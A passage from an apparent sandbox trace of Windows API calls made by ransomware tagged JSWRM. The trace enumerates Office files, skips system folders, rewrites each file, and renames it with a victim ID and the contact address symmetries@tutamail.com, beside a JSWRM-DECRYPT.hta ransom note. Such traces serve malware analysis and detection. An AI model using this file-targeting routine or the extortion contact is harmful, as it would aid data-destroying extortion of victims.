hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19f30) returned 0x24c1d0 [0112.317] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x19f30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x19f30, lpOverlapped=0x0) returned 1 [0112.360] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.360] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x19f30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x19f30, lpOverlapped=0x0) returned 1 [0112.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.361] CloseHandle (hObject=0x238) returned 1 [0112.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0112.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0112.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0112.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0112.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0112.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0112.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.362] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\excelmui.msi.16_excelmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\excelmui.msi.16_excelmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\excelmui.msi.16_excelmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\excelmui.msi.16_excelmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0112.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0112.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0112.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0112.363] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x92201bc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x92201bc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x97efe5f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x653c, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="groovemui.msi.16_groovemui.mcxml", cAlternateFileName="GROOVE~1.MCX")) returned 1 [0112.363] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2=".") returned 1 [0112.363] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2="..") returned 1 [0112.363] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2="...") returned 1 [0112.364] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2="windows") returned -1 [0112.364] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2="recovery") returned -1 [0112.364] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2="perflogs") returned -1 [0112.364] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2="documents and settings") returned 1 [0112.364] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.364] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2="system volume information") returned -1 [0112.364] lstrcmpiW (lpString1="groovemui.msi.16_groovemui.mcxml", lpString2="msocache") returned -1 [0112.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0112.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="groovemui.msi.16_groovemui.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="groovemui.msi.16_groovemui.mcxml", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="groovemui.msi.16_groovemui.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0112.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0112.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="groovemui.msi.16_groovemui.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="groovemui.msi.16_groovemui.mcxml", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="groovemui.msi.16_groovemui.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0112.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0112.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0112.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0112.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\groovemui.msi.16_groovemui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\groovemui.msi.16_groovemui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.365] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25916) returned 1 [0112.365] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6530) returned 0x24c1d0 [0112.366] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6530, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x6530, lpOverlapped=0x0) returned 1 [0112.369] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.369] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6530, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x6530, lpOverlapped=0x0) returned 1 [0112.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.369] CloseHandle (hObject=0x238) returned 1 [0112.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0112.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0112.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0112.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0112.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0112.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0112.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.370] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\groovemui.msi.16_groovemui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\groovemui.msi.16_groovemui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\groovemui.msi.16_groovemui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\groovemui.msi.16_groovemui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.371] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x399204d5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x399204d5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x399204d5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0112.371] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0112.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0112.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0112.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0112.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0112.371] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x92201bc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x92201bc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x97efe5f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1249c, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="lyncmui.msi.16_lyncmui.mcxml", cAlternateFileName="LYNCMU~1.MCX")) returned 1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2=".") returned 1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2="..") returned 1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2="...") returned 1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2="windows") returned -1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2="recovery") returned -1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2="perflogs") returned -1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2="documents and settings") returned 1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2="system volume information") returned -1 [0112.372] lstrcmpiW (lpString1="lyncmui.msi.16_lyncmui.mcxml", lpString2="msocache") returned -1 [0112.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncmui.msi.16_lyncmui.mcxml", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0112.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncmui.msi.16_lyncmui.mcxml", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lyncmui.msi.16_lyncmui.mcxml", lpUsedDefaultChar=0x0) returned 28 [0112.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0112.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncmui.msi.16_lyncmui.mcxml", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0112.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncmui.msi.16_lyncmui.mcxml", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lyncmui.msi.16_lyncmui.mcxml", lpUsedDefaultChar=0x0) returned 28 [0112.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0112.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0112.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0112.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0112.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\lyncmui.msi.16_lyncmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\lyncmui.msi.16_lyncmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.373] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=74908) returned 1 [0112.373] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12490) returned 0x24c1d0 [0112.373] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x12490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x12490, lpOverlapped=0x0) returned 1 [0112.380] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.380] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x12490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x12490, lpOverlapped=0x0) returned 1 [0112.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.381] CloseHandle (hObject=0x238) returned 1 [0112.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0112.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0112.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0112.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0112.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0112.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0112.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.381] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\lyncmui.msi.16_lyncmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\lyncmui.msi.16_lyncmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\lyncmui.msi.16_lyncmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\lyncmui.msi.16_lyncmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0112.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0112.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0112.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0112.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0112.382] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x98ae9c2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x98ae9c2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x98fae45, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11ac0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="office32mui.msi.16_office32mui.mcxml", 